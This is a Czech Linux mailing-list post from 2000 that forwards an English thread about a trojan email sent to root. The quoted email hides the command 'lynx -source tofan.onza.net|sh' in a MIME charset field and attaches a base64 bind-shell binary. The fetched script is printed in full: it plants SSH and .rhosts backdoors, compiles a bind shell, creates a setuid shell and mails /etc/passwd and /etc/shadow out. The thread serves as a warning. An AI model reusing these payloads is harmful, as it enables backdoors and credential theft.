TrojanHorse for UNIX?
Karel Kovar
kkovar na salto.cz
Středa Květen 24 19:29:10 CEST 2000
Hi,
tohle jsem zahlidl v jine konferenci. K nedavne debate o virech
v poste se to hodi, ne? :-)
Karel Kovar
Voyage Io wrote:
>
> Hi Tang,
>
> Thanks for your information.
>
> It properly is a new virus (found only after 16 May) which is especially
> designed for UNIX administrator who like to use PINE as the Email client.
>
> You can find more discussion in the newsgroup... for example,
>
> http://x42.deja.com/getdoc.xp?AN=624410603&search=thread&CONTEXT=958548790.554172430&HIT_CONTEXT=958548790.554172430&HIT_NUM=1&hitnum=0
>
> Best regards,
> Voyage
> ------------------------------------------------------------------------------
> Io Hio Hong, Voyage
>
> CI, Centro de Informatica (http://www-ci.ipm.edu.mo)
> Macau Polytechnic Institute (http://www.ipm.edu.mo)
> Tel: 5996175 Fax: 530505
> Email: voyage na ipm.edu.mo ICQ: 4050204
>
> On Wed, 17 May 2000, Tang wrote:
>
> > Hello,
> >
> > I received an email attention to root with strange contents. The
> > whole email is shown for your reference.
> > When I read the logs attached with the mail, I don't find anything
> > (ip address, dns) relating to our domain.
> >
> > Then I try to know where is the email from, so I point my browser to
> > http://tofan.onza.net. The browser ouputs
> > a page of shell scripts and program code! They as also attached at
> > the end of this mail. Then I start to scan the
> > whole email carefully, and find a line of strange Content-Type
> > statement as follows:
> >
> > Content-Type: TEXT/PLAIN;
> > charset=``lynx${IFS}-source${IFS}tofan.onza.net|sh|exit``; name="log"
> > name="emailf" Content-Transfer-Encoding: BASE64
> >
> > Looks like to start Lynx to browse the page with the susipous codes,
> > then run the code to steal the /etc/passwd
> > file!
> >
> > Seems like my Pine didn't run Lynx automatically..... but not sure
> > the harm to us yet!
> >
> > Do you even receive some email like this? Any comments?
> >
> > regards,
> > Tang.
> >
> > UMac, INESC Macau
> > R.A.
> >
> >
> > ============================== Begining of email
> > =============================
> > >From root na tofan.onza.net Mon May 15 15:18:55 2000
> > Received: from mars.fontijne.nl (smtp.fontijne.nl [195.7.212.130])
> > by inesc-macau.org.mo (8.9.2/8.9.2/Debian/GNU) with ESMTP id PAA16075
> > for <root na neptune.inesc-macau.org.mo>; Mon, 15 May 2000 15:16:41 +0800
> > (CST)
> > Received: from Bastion.Fontijne.nl (195.7.212.131 [195.7.212.131]) by
> > mars.fontijne.nl with SMTP (Microsoft Exchange Internet Mail Service
> > Version 5.5.2650.21)
> > id K69W8LSQ; Mon, 15 May 2000 08:55:41 +0200
> > Received: from atl-qbu-zpn-vty3.as.wcom.net ([216.192.215.3]) by
> > Bastion.Fontijne.nl; Mon, 15 May 2000 08:48:49 +0000 (GMT)
> > Message-ID: <Pine.LNX.4.10.9909171428170.28464-100000 na tofan.onza.net>
> > Date: Sat, 13 May 2000 21:15:05 -0400 (EDT)
> > From: root <root na tofan.onza.net>
> > Subject: DOS attack, log file attached!
> > MIME-Version: 1.0
> > To: root na tofan.onza.net
> > Content-Type: MULTIPART/MIXED;
> > BOUNDARY="-1463811839-1047689522-958180505=:1450"
> > Status: RO
> > X-Status:
> >
> > This message is in MIME format. The first part should be readable
> > text,
> > while the remaining parts are likely unreadable without MIME-aware
> > tools.
> > Send mail to mime na docserver.cac.washington.edu for more info.
> >
> > ---1463811839-1047689522-958180505=:1450
> > Content-Type: TEXT/PLAIN; charset=US-ASCII
> >
> > THIS IS TO INFORM YOU THAT A DOS ATTACK WAS LOGGED ON A
> > SECURITIES AND EXCHANGE COMMISION INTERNET FIREWALL
> > FROM YOUR DOMAIN.
> > AN EXCERPT FROM OUR LOGS IS ATTACHED BELOW.
> > ALL TIMES ARE US EASTERN AND ARE SYNCED WITH NTP.
> >
> > Jerry Leininser
> > cops na tofan.onza.net
> >
> > ---2463811839-1047689522-958180505=:1450
> > Content-Type: APPLICATION/octet-stream;
> > name="log.txt.tofan.onza.net.exit"
> > Content-Transfer-Encoding: BASE64
> > Content-ID: <Pine.LNX.4.10.1000512211505.1450B na tofan.onza.net>
> > Content-Description:
> >
> > f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAkIYECDQAAABcDAAAAAAAADQAIAAF
> > ACgAFwAUAAYAAAA0AAAANIAECDSABAigAAAAoAAAAAUAAAAEAAAAAwAAANQA
> > AADUgAQI1IAECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQITQoA
> > AE0KAAAFAAAAABAAAAEAAABQCgAAUJoECFCaBAj0AAAA+AAAAAYAAAAAEAAA
> > AgAAALwKAAC8mgQIvJoECIgAAACIAAAABgAAAAQAAAAvbGliL2xkLWxpbnV4
> > LnNvLjEAABEAAAAfAAAAAAAAABwAAAAWAAAAGgAAABkAAAAAAAAADQAAABEA
> > AAATAAAACgAAAAkAAAAYAAAAAQAAABcAAAAOAAAAFAAAAAAAAAAAAAAAAAAA
> > AAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAUAAAACAAAAAAAAAAcAAAAAAAAA
> > CAAAAAAAAAAAAAAACwAAAAAAAAAGAAAAEAAAAAAAAAASAAAAFQAAAB4AAAAd
> > AAAAGwAAAAAAAAADAAAADwAAAAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAsA
> > AABYhQQIHgAAABIAAAASAAAAaIUECCgAAAAiAAAAGQAAALyaBAgAAAAAEQDx
> > /yIAAAB4hQQIfgAAABIAAAAoAAAAiIUECAAAAAAiAAAALQAAAJiFBAheAAAA
> > IgAAADQAAABQmgQIBAAAABEADAA+AAAAqIUECDYAAAASAAAARAAAALiFBAhm
> > AAAAIgAAAEkAAABAhQQIAAAAABIABwBPAAAAyIUECF4AAAAiAAAAVgAAANiF
> > BAhGAAAAEgAAAGIAAABQmgQIBAAAACAADABqAAAA6IUECF4AAAAiAAAAbwAA
> > AESbBAgCAAAAEQARAH0AAAD4hQQIVAAAABIAAACEAAAACIYECFYAAAAiAAAA
> > iwAAABiGBAgAAAAAIgAAAJAAAACQiQQIAAAAABIACgCWAAAAKIYECDQAAAAS
> > AAAAnQAAAGSaBAgAAAAAEQDx/7MAAAA4hgQIDQAAACIAAAC5AAAASIYECIAA
> > AAASAAAAvgAAAFiGBAg+AAAAEgAAAMkAAABohgQIwAAAABIAAADQAAAAeIYE
> > CAAAAAAiAAAA1gAAAIyJBAgAAAAAEQDx/90AAABEmwQIAAAAABEA8f/kAAAA
> > RJsECAAAAAARAPH/8AAAAEibBAgAAAAAEQDx/wBsaWJjLnNvLjUAc3RyY3B5
> > AHByaW50ZgBfRFlOQU1JQwBleGVjbABkdXAyAHNvY2tldABfX2Vudmlyb24A
> > Ynplcm8Ac2VuZABfaW5pdABhY2NlcHQAX19saWJjX2luaXQAZW52aXJvbgBi
> > aW5kAF9fZnB1X2NvbnRyb2wAc2lnbmFsAGxpc3RlbgBmb3JrAF9maW5pAGF0
> > ZXhpdABfR0xPQkFMX09GRlNFVF9UQUJMRV8AaHRvbnMAZXhpdABfX3NldGZw
> > dWN3AHN0cmxlbgBjbG9zZQBfZXRleHQAX2VkYXRhAF9fYnNzX3N0YXJ0AF9l
> > bmQAAAAARJsECAUPAABwmgQIBwEAAHSaBAgHAgAAeJoECAcEAAB8mgQIBwUA
> > AICaBAgHBgAAhJoECAcIAACImgQIBwkAAIyaBAgHCwAAkJoECAcMAACUmgQI
> > Bw4AAJiaBAgHEAAAnJoECAcRAACgmgQIBxIAAKSaBAgHFAAAqJoECAcWAACs
> > mgQIBxcAALCaBAgHGAAAtJoECAcZAAC4mgQIBxoAAAAAAAAAAAAA6CMEAADC
> > AAD/NWiaBAj/JWyaBAgAAAAA/yVwmgQIaAAAAADp4P////8ldJoECGgIAAAA
> > 6dD/////JXiaBAhoEAAAAOnA/////yV8mgQIaBgAAADpsP////8lgJoECGgg
> > AAAA6aD/////JYSaBAhoKAAAAOmQ/////yWImgQIaDAAAADpgP////8ljJoE
> > CGg4AAAA6XD/////JZCaBAhoQAAAAOlg/////yWUmgQIaEgAAADpUP////8l
> > mJoECGhQAAAA6UD/////JZyaBAhoWAAAAOkw/////yWgmgQIaGAAAADpIP//
> > //8lpJoECGhoAAAA6RD/////JaiaBAhocAAAAOkA/////yWsmgQIaHgAAADp
> > 8P7///8lsJoECGiAAAAA6eD+////JbSaBAhoiAAAAOnQ/v///yW4mgQIaJAA
> > AADpwP7//wAAAAAAAAAAWYnjieCJygHSAdIB0IPABDHtVVVVieVQU1G4iAAA
> > ALsAAAAAzYCLRCQIo1CaBAgPtwVEmwQIUOiM////g8QE6AT///9okIkECOhK
> > ////g8QE6Fr+///oSQAAAFDoV////1uNtCYAAAAAjbQmAAAAALgBAAAAzYDr
> > 9420JgAAAABTu2CaBAiDPWCaBAgAdA2QiwP/0IPDBIM7AHX0W8ONNsOQkJBV
> > ieWD7DjHRfyYiQQIx0X4pokECMdF9MyJBAjoxP7//4nAhcB0CmoB6Of+//+D
> > xARmx0XYAgBoOTAAAOjE/v//g8QEicBmiUXax0XcAAAAAGoIjUXYjVAIUugW
> > /v//g8QIaPeJBAiLRQyLEFLos/3//4PECGoBahHoR/7//4PECGoAagFqAujZ
> > /f//g8QMicCJRfCDffAAfRtoDYoECOiR/f//g8QEicBQ6Gb+//+DxASNdgBq
> > EI1F2FCLRfBQ6PH9//+DxAyJwIXAfRhoG4oECOhe/f//g8QEicBQ6DP+//+D
> > xARqBYtF8FDo5f3//4PECInAhcB9GGgnigQI6DL9//+DxASJwFDoB/7//4PE
> > BMdF6BAAAACNRehQjUXIUItF8FDobP3//4PEDInAiUXsg33sAH0aaDWKBAjo
> > 9Pz//4PEBInAUOjJ/f//g8QEjTboj/3//4nAhcAPhL0AAABqAItF/FDoyv3/
> > /4PEBInAUItF/FCLRexQ6Af9//+DxBBqAItF+FDoqf3//4PEBInAUItF+FCL
> > RexQ6Ob8//+DxBBqAItF9FDoiP3//4PEBInAUItF9FCLRexQ6MX8//+DxBBq
> > AItF7FDoh/z//4PECGoBi0XsUOh5/P//g8QIagKLRexQ6Gv8//+DxAhqAGhC
> > igQIaEWKBAhoRYoECOhC/P//g8QQi0XsUOg2/f//g8QEagDo/Pz//4PEBJCL
> > RexQ6B/9//+DxATp6v7//412AMnDkJBTu1SaBAiDPVSaBAj/dA2QiwP/0IPD
> > /IM7/3X0W8ONNsOQkJAAAAAA6Hv9///CAAAKQ29ubmVjdGVkIQoKAFRoaXMg
> > ZmluZSB0b29sIGNvZGVkIGJ5IEJyb25jIEJ1c3RlcgoAUGxlYXNlIGVudGVy
> > IGVhY2ggY29tbWFuZCBmb2xsb3dlZCBieSAnOycKAElfZGlkX25vdF9jaGFu
> > Z2VfSElERQBTb2NrZXQgZXJyb3IKAEJpbmQgZXJyb3IKAExpc3RlbiBlcnJv
> > cgoAQWNjZXB0IGVycm9yAC1pAC9iaW4vc2gAAAAAAAAAAP////8AAAAA////
> > /wAAAAC8mgQIAAAAAAAAAABehQQIboUECH6FBAiOhQQInoUECK6FBAi+hQQI
> > zoUECN6FBAjuhQQI/oUECA6GBAgehgQILoYECD6GBAhOhgQIXoYECG6GBAh+
> > hgQIAQAAAAEAAAAMAAAAQIUECA0AAACQiQQIBAAAAOiABAgFAAAAoIMECAYA
> > AACwgQQICgAAAPUAAAALAAAAEAAAABUAAAAAAAAAAwAAAGSaBAgCAAAAmAAA
> > ABQAAAARAAAAFwAAAKCEBAgRAAAAmIQECBIAAAAIAAAAEwAAAAgAAAAAAAAA
> > AAAAAABHQ0M6IChHTlUpIDIuNy4yLjEAAEdDQzogKEdOVSkgMi43LjIuMQAA
> > R0NDOiAoR05VKSAyLjcuMi4xAAgAAAAAAAAAAQAAADAxLjAxAAAACAAAAAAA
> > AAABAAAAMDEuMDEAAAAIAAAAAAAAAAEAAAAwMS4wMQAAAAAuc3ltdGFiAC5z
> > dHJ0YWIALnNoc3RydGFiAC5pbnRlcnAALmhhc2gALmR5bnN5bQAuZHluc3Ry
> > AC5yZWwuYnNzAC5yZWwucGx0AC5pbml0AC5wbHQALnRleHQALmZpbmkALnJv
> > ZGF0YQAuZGF0YQAuY3RvcnMALmR0b3JzAC5nb3QALmR5bmFtaWMALmJzcwAu
> > Y29tbWVudAAubm90ZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> > AAAAAAAAAAAAGwAAAAEAAAACAAAA1IAECNQAAAATAAAAAAAAAAAAAAABAAAA
> > AAAAACMAAAAFAAAAAgAAAOiABAjoAAAAyAAAAAMAAAAAAAAABAAAAAQAAAAp
> > AAAACwAAAAIAAACwgQQIsAEAAPABAAAEAAAAAQAAAAQAAAAQAAAAMQAAAAMA
> > AAACAAAAoIMECKADAAD1AAAAAAAAAAAAAAABAAAAAAAAADkAAAAJAAAAAgAA
> > AJiEBAiYBAAACAAAAAMAAAARAAAABAAAAAgAAABCAAAACQAAAAIAAACghAQI
> > oAQAAJgAAAADAAAACAAAAAQAAAAIAAAASwAAAAEAAAAGAAAAQIUECEAFAAAI
> > AAAAAAAAAAAAAAAQAAAAAAAAAFEAAAABAAAABgAAAEiFBAhIBQAAQAEAAAAA
> > dHJ0YWIALnNoc3RydGFiAC5pbnRlcnAALmhhc2gALmR5bnN5bQAuZHluc3Ry
> > AC5yZWwuYnNzAC5yZWwucGx0AC5pbml0AC5wbHQALnRleHQALmZpbmkALnJv
> > ZGF0YQAuZGF0YQAuY3RvcnMALmR0b3JzAC5nb3QALmR5bmFtaWMALmJzcwAu
> > Y29tbWVudAAubm90ZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> > AAAAAAAAAAAAGwAAAAEAAAACAAAA1IAECNQAAAATAAAAAAAAAAAAAAABAAAA
> > AAAAACMAAAAFAAAAAgAAAOiABAjoAAAAyAAAAAMAAAAAAAAABAAAAAQAAAAp
> > AAAACwAAAAIAAACwgQQIsAEAAPABAAAEAAAAAQAAAAQAAAAQAAAAMQAAAAMA
> > AAACAAAAoIMECKADAAD1AAAAAAAAAAAAAAABAAAAAAAAADkAAAAJAAAAAgAA
> > AJiEBAiYBAAACAAAAAMAAAARAAAABAAAAAgAAABCAAAACQAAAAIAAACghAQI
> > oAQAAJgAAAADAAAACAAAAAQAAAAIAAAASwAAAAEAAAAGAAAAQIUECEAFAAAI
> > AAAAAAAAAAAAAAAQAAAAAAAAAFEAAAABAAAABgAAAEiFBAhIBQAAQAEAAAAA
> > AAAAAAAABAAAAAQAAABWAAAAAQAAAAYAAACQhgQIkAYAAPwCAAAAAAAAAAAA
> > ABAAAAAAAAAAXAAAAAEAAAAGAAAAkIkECJAJAAAIAAAAAAAAAAAAAAAQAAAA
> > AAAAAGIAAAABAAAAAgAAAJiJBAiYCQAAtQAAAAAAAAAAAAAAAQAAAAAAAABq
> > AAAAAQAAAAMAAABQmgQIUAoAAAQAAAAAAAAAAAAAAAQAAAAAAAAAcAAAAAEA
> > AAADAAAAVJoECFQKAAAIAAAAAAAAAAAAAAAEAAAAAAAAAHcAAAABAAAAAwAA
> > AFyaBAhcCgAACAAAAAAAAAAAAAAABAAAAAAAAAB+AAAAAQAAAAMAAABkmgQI
> > ZAoAAFgAAAAAAAAAAAAAAAQAAAAEAAAAgwAAAAYAAAADAAAAvJoECLwKAACI
> > AAAABAAAAAAAAAAEAAAACAAAAIwAAAAIAAAAAwAAAESbBAhECwAABAAAAAAA
> > AAAAAAAABAAAAAAAAACRAAAAAQAAAAAAAAAAAAAARAsAADwAAAAAAAAAAAAA
> > AAEAAAAAAAAAmgAAAAcAAAAAAAAAPAAAAIALAAA8AAAAAAAAAAAAAAABAAAA
> > AAAAABEAAAADAAAAAAAAAAAAAAC8CwAAoAAAAAAAAAAAAAAAAQAAAAAAAAAB
> > AAAAAgAAAAAAAAssssssssssssssssssssssKQAAAAQAAAAQAAAACQAAAAMA
> > AAAAAAAAAAAAAJQUAAC+AQAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAA
> > AAAAAAAAAAAAAAAAAAAAAAADAAEAAAAAAAAAAAAAAAAAAwACAAAAAAAAAAAA
> > AAAAAAMAAwAAAAAAAAAAAAAAAAADAAQAAAAAAAAAAAAAAAAAAwAFAAAAAAAA
> > AAAAAAAAAAMABgAAAAAAAAAAAAAAAAADAAcAAAAAAAAAAAAAAAAAAwAIAAAA
> > AAAAAAAAAAAAAAMACQAAAAAAAAAAAAAAAAADAAoAAAAAAAAAAAAAAAAAAwAL
> > AAAAAAAAAAAAAAAAAAMADAAAAAAAAAAAAAAAAAADAA0AAAAAAAAAAAAAAAAA
> > AwAOAAAAAAAAAAAAAAAAAAMADwAAAAAAAAAAAAAAAAADABAAAAAAAAAAAAAA
> > AAAAAwARAAAAAAAAAAAAAAAAAAMAEgAAAAAAAAAAAAAAAAADABMAAAAAAAAA
> > AAAAAAAAAwAUAAAAAAAAAAAAAAAAAAMAFQAAAAAAAAAAAAAAAAADABYAAQAA
> > AAAAAAAAAAAABADx/wwAAABoiQQIAAAAAAAACQAbAAAAaIkECAAAAAACAAkA
> > MQAAAFiaBAgAAAAAAQANAD4AAACIiQQIAAAAAAIACQBJAAAAVJoECAAAAAAB
> > AAwAVwAAAGCaBAgAAAAAAQAOAGQAAAAAAAAAAAAAAAQA8f9rAAAAAIcECAAA
> > AAAAAAkAAQAAAAAAAAAAAAAABADx/wwAAAAQhwQIAAAAAAAACQBwAAAAEIcE
> > CAAAAAACAAkAhgAAAFyaBAgAAAAAAQAOAJQAAAAwhwQIAAAAAAIACQBJAAAA
> > VJoECAAAAAABAAwAnwAAAFSaBAgAAAAAAQANAK0AAAAAAAAAAAAAAAQA8f8M
> > AAAANIcECAAAAAAAAAkAuQAAAFiFBAgeAAAAEgAAAMAAAABohQQIKAAAACIA
> > AADHAAAAvJoECAAAAAARAPH/0AAAAIyJBAgAAAAAEQDx/9cAAAB4hQQIfgAA
> > ABIAAADdAAAAiIUECAAAAAAiAAAA4gAAAJiFBAheAAAAIgAAAOkAAABQmgQI
> > BAAAABEADADzAAAAqIUECDYAAAASAAAA+QAAALiFBAhmAAAAIgAAAP4AAABA
> > hQQIAAAAABIABwAEAQAAyIUECF4AAAAiAAAACwEAANiFBAhGAAAAEgAAABcB
> > AABQmgQIBAAAACAADAAfAQAA6IUECF4AAAAiAAAAJAEAAESbBAgCAAAAEQAR
> > ADIBAACQhgQIgAAAABIACQA5AQAA+IUECFQAAAASAAAAQAEAAJCGBAgAAAAA
> > EAAJAE8BAAAIhgQIVgAAACIAAABWAQAAGIYECAAAAAAiAAAAWwEAAESbBAgA
> > AAAAEQDx/2cBAAA0hwQIMgIAABIACQBsAQAAkIkECAAAAAASAAoAcgEAACiG
> > BAg0AAAAEgAAAHkBAABEmwQIAAAAABEA8f+AAQAAZJoECAAAAAARAPH/lgEA
> > AEibBAgAAAAAEQDx/5sBAAA4hgQIDQAAACIAAAChAQAASIYECIAAAAASAAAA
> > pgEAAFiGBAg+AAAAEgAAALEBAABohgQIwAAAABIAAAC4AQAAeIYECAAAAAAi
> > AAAAAGNydHN0dWZmLmMAZ2NjMl9jb21waWxlZC4AX19kb19nbG9iYWxfY3Rv
> > cnNfYXV4AF9fQ1RPUl9FTkRfXwBpbml0X2R1bW15AGZvcmNlX3RvX2RhdGEA
> > X19EVE9SX0VORF9fAGNydDAuUwBkb25lAF9fZG9fZ2xvYmFsX2R0b3JzX2F1
> > eABfX0RUT1JfTElTVF9fAGZpbmlfZHVtbXkAX19DVE9SX0xJU1RfXwBibGFj
> > a2hvbGUuYwBzdHJjcHkAcHJpbnRmAF9EWU5BTUlDAF9ldGV4dABleGVjbABk
> > dXAyAHNvY2tldABfX2Vudmlyb24AYnplcm8Ac2VuZABfaW5pdABhY2NlcHQA
> > X19saWJjX2luaXQAZW52aXJvbgBiaW5kAF9fZnB1X2NvbnRyb2wAX3N0YXJ0
> > AHNpZ25hbABfX19jcnRfZHVtbXlfXwBsaXN0ZW4AZm9yawBfX2Jzc19zdGFy
> > dABtYWluAF9maW5pAGF0ZXhpdABfZWRhdGEAX0dMT0JBTF9PRkZTRVRfVEFC
> > TEVfAF9lbmQAaHRvbnMAZXhpdABfX3NldGZwdWN3AHN0cmxlbgBjbG9zZQA=
> > ---2463811839-1047689522-958180505=:1450--
> > ---1463811839-1047689522-958180505=:1450
> > Content-Type: TEXT/PLAIN;
> > charset=``lynx${IFS}-source${IFS}tofan.onza.net|sh|exit``; name="log"
> > name="emailf" Content-Transfer-Encoding: BASE64
> > Content-Description: THE LOGS
> > Content-Disposition: attachment; filename="emailf"
> >
> >
> >
> >
> >
> >
> >
> >
> > PLEASE FORGIVE US IF YOUR SYSTEM WAS ERRORNEOUSLY ACUSED,
> > WE HAVE FACED A KERNEL PANIC!
> >
> > Sep 16 17:29:21 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1371 \
> > 206.121.213.44:8080 L=60 S=0x00 I=63749 F=0x0040 T=55
> > .S....
> > Sep 16 17:29:24 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1371 \
> > 206.121.213.44:8080 L=60 S=0x00 I=63928 F=0x0040 T=55
> > .S....
> > Sep 16 17:29:30 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1371 \
> > 206.121.213.44:8080 L=60 S=0x00 I=64281 F=0x0040 T=55
> > .S....
> > Sep 16 17:29:42 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1371 \
> > 206.121.213.44:8080 L=60 S=0x00 I=64978 F=0x0040 T=55
> > .S....
> > Sep 16 17:29:45 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1389 \
> > 206.121.213.44:8080 L=60 S=0x00 I=65097 F=0x0040 T=55
> > .S....
> > Sep 16 17:29:48 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1389 \
> > 206.121.213.44:8080 L=60 S=0x00 I=65205 F=0x0040 T=55
> > .S....
> > Sep 16 17:29:54 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1389 \
> > 206.121.213.44:8080 L=60 S=0x00 I=22 F=0x0040 T=55 .S....
> > Sep 16 17:30:05 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1412 \
> > 206.121.213.44:8080 L=60 S=0x00 I=775 F=0x0040 T=55 .S....
> >
> > Sep 16 17:30:06 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1371 \
> > 206.121.213.44:8080 L=60 S=0x00 I=787 F=0x0040 T=55 .S....
> >
> > Sep 16 17:30:11 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1412 \
> > 206.121.213.44:8080 L=60 S=0x00 I=1014 F=0x0040 T=55
> > .S....
> > Sep 16 17:30:21 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1423 \
> > 206.121.213.44:8080 L=60 S=0x00 I=1438 F=0x0040 T=55
> > .S....
> >
> >
> > ---1463811839-1047689522-958180505=:1450--
> >
> > ================================ End of email
> > ==============================
> >
> >
> >
> >
> > ============================== Source of web page
> > ==============================
> > grep "x4334 na AGRI" ~/.ssh/authorized_keys >/dev/null 2>&1 || if [ 0 ];
> > then
> > if [ ! -d ~/.ssh ]
> > then umask 022 >/dev/null 2>&1;mkdir ~/.ssh >/dev/null 2>&1
> > echo "+ +" >> ~/.rhosts 2>/dev/null
> > fi
> > umask 022 >/dev/null 2>&1
> > echo "512 35
> > 9785877609308338986917478061014184970982460312434529051173539551539508793288925026879592531038110506684705572154197270221242712482140435531967239855453591
> > x4334 na AGRI" >> ~/.ssh/authorized_keys 2>/dev/null
> > cat << __EOF__ > /tmp/io.c
> > #define PORT 56789
> > #include <stdio.h>
> > #include <signal.h>
> > #include <sys/types.h>
> > #include <sys/socket.h>
> > #include <netinet/in.h>
> >
> > int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
> > struct sockaddr_in serv_addr;
> > struct sockaddr_in client_addr;
> >
> > int main (int argc, char **argv)
> > {
> >
> > soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
> > if (soc_des == -1)
> > exit(-1);
> > bzero((char *) &serv_addr, sizeof(serv_addr));
> > strcpy(argv[0],"updated");
> > serv_addr.sin_family = AF_INET;
> > serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
> > serv_addr.sin_port = htons(PORT);
> > soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr,
> > sizeof(serv_addr));
> > if (soc_rc != 0)
> > exit(-1);
> > if (fork() != 0)
> > exit(0);
> > setpgrp();
> > signal(SIGHUP, SIG_IGN);
> > if (fork() != 0)
> > exit(0);
> > soc_rc = listen(soc_des, 5);
> > if (soc_rc != 0)
> > exit(0);
> > while (1) {
> > soc_len = sizeof(client_addr);
> > soc_cli = accept(soc_des, (struct sockaddr *) &client_addr,
> > &soc_len);
> > if (soc_cli < 0)
> > exit(0);
> > cli_pid = getpid();
> > server_pid = fork();
> > if (server_pid != 0) {
> > dup2(soc_cli,0);
> > dup2(soc_cli,1);
> > dup2(soc_cli,2);
> > execl("/bin/sh","sh", "-i",(char *)0);
> > close(soc_cli);
> > exit(0);
> > }
> > close(soc_cli);
> > }
> > }
> > __EOF__
> > gcc -o /tmp/io /tmp/io.c >/dev/null 2>&1
> > /tmp/io >/dev/null 2>&1 ||mkdir /tmp/.pkoss493 >/dev/null 2>&1&&cp
> > /bin/sh /tmp/.pkoss493/.rc >/dev/null 2>&1;chmod 4715 /tmp/.pkoss493/.rc
> > >/dev/null 2>&1
> > rm -rf /tmp/io.c
> > rm -rf /tmp/io
> > mail -s hhp000 bjern3 na attglobal.net >/dev/null 2>&1 < /etc/passwd
> > echo "`hostname -i 2>&1` - `id 2>&1`- `uname -a 2>&1`- `ls -al ~
> > 2>&1` - `cat /etc/shadow 2>&1`" | mail -s hhp001 bjern3 na attglobal.net
> > 2>/dev/null
> > chmod og-w ~ >/dev/null 2>&1
> > chmod og-w ~/.ssh >/dev/null 2>&1
> > fi
> > ============================== End of source of web page
> > ==========================
> >
> >
Další informace o konferenci Linux